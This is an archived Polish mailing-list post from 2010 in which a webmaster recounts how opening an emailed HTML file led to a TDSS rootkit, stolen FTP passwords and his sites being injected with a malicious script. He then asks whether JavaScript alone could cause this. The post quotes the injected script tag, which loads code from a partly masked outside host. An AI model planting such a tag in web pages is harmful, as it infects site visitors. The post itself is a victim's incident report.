Witam,
Mowa o systemie XP, konto z uprawnieniami admina.
Czy jest możliwe, aby po otwarciu w przeglądarce (lokalnie, z puplipu) strony
www, na której znajduje się złośliwy kod JS typu:
<script type="text/javascript"
src="http://XXXXXXomestore.com:8080/File.js"></script>
doszło do tak poważnych wydarzeń jak:
1. istalacja w systemie trojana
2. instalacja root-kita, który ukrywa trojana
3. kradzież haseł do licznych kont FTP z ustawień Total Commandera!
4. wklejenie złośliwego kodu JS do setek plików na wszystkich serwerach do
których udało się robotowi zalogować dzięki ukradzionym tak hasłom do FTP.
Masakra!
Bo wczoraj tak się właśnie u mnie stało - mimo, ze cały czas działał Kaspersky.
Tzn. ja nie wiem czy rzeczywiscie doszło do tego w taki sposób, dlatego pytam
tutaj, czy to możliwe, ale z moje strony wyglądało to tak:
1. Otrzymałem mailem czystko tekstowy (ASCII) załącznik .html
2. Skopiowałem go na pulpit i przeksnowałem antywirem - czysty.
3. Otworzyłem go EditPlusem, w środku zobaczyłem tylko taki kod JS jak wyżej.
4. I wtedy diabeł mnie skusił, aby otworzyć ten plik pod FireFox - odpaliłem
(chciałem zobaczyć czy Kaspersky zareaguje).
5. Kaspersky (moduł heuristic) owszem, zareagował! Podniósł alarm, że wykrył
złośliwy kod i że ZOSTAŁ ON
ZABLOKOWANY !!! !!! !!!
6. Myślałem więc, że nic sie nie stało. Nie zauważyłem nic nienormalnego.
7. Wyłączyłem kompa i poszedłem do pracy.
8. Wróćiłem, odpalam kompa i zaczęły się pojawiać dość subtelne objawy infekcji,
mianowicie:
a) podczas wyszukiwania czegokolwiek w Google Kaspersky alarmwował, że
blokuje jakieś adresy Phishingowe.
b) w "msconfig" / "autostart" pojawiła sie pozycja wwwamq32.exe, której nie
dawało się wyłączyć (tzn. dawało sie, ale włączała sie spowrotem".
9. Zapuściłem skan Kasperskim i wykrył w pamieci RAM obecnosc rootkita
Rootkit.Win32.TDSS.bgqo. Probował go usuwać - wymuszajac podczas tej procedury
restart systemu, ale bezskutecznie.
10. Dopiero Kaspersky odpalony spod innego systetmu znalazł i usunął szkodnika w
3 miejscach:
http://www.medfoto.pl/img/rootkit.png
Myślałem, że już po sprawie, ale to był dopiero początek horroru...
Wszedłem na jedną ze stron www, które prowadzę (jako webmaster) i Kapsersky
podniósł alarm, ze
zablokował na niej złośliwy skrypt. Zalogowałem sie przez FTP i zobaczyłem, że
wszelkie pliki index.php, wszystkie pliki *.js i trochę innych, zostało
zmodyfikowanych - dopisany do nich został cytowany na początku kod JS.
Pół nocy siedziałem i wywalałem złośliwy kod z setek różnych plików.
Na szczęście w tych godzinach ruch na stronach znikomy, ale pewnie parę osób się
zaraziło, nie wiem tylko jak poważnie, czy w taki sam sposób jak mój komp
pierwotnie (przypomnę, że ja odpaliłem plik z kodem JS lokalnie, a nie z netu -
być moze to czyni różnicę?).
W międzyczasie Kaspersky przestał blokować strony na których złośliwy kod
jeszcze był. Wygląda na to, że mają one z góry ustaloną na krótki czas
żywotność.
Oczywiście zmieniłem jeszcze wszystkie hasła, w tym hasła do baz SQL, które
przecież po zalogowaniu się przez FTP robot mógł ukraść z plików config. forum
phpBB.
Dla mnie morał jest taki, że nie wolno trzymać haseł do kont FPT zapisanych w
kliencie FTP. Trzeba je mieć w głowie.
Swoją drogą - nie wiem jeszcze, czy wirus ten nie ukradł też jakichś innych
haseł, np. zapisanych w przeglądarkach www. Tych na szczęście miałem mało,
głównie do jakichś Forum, gdzie mam uprawnienia szargo użytkownika.
Ale powtórzę pytanie początkowe - czy to wszystko mogło sie zacząć od
"niewinnego" kodu JS? Czy JS ma taki potencjał, że moze zmusić przeglądarkę do
zainstalowania takiego syfu bez zgody użytkownika? Przecież rootkit, to niemal
jak driver systemowy. Zapewniam, że nie byłem pytany o żadne potwierdzenia.
Wszystko się zainstalowało po cichu (Win XP, kotno z uprawnieniami admina).
Jeśli to się zaczęło przez JS, to jestem przerażony...
Jeśli inaczej - to jestem załamany, że nie wiem jak.
Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś tam
blokuje, ale jednak z zerowym efektem!
Dzięki,
latet
Received on Wed Jun 16 15:35:02 2010
To archiwum zostało wygenerowane przez hypermail 2.1.8 : Wed 16 Jun 2010 - 15:42:01 MET DST
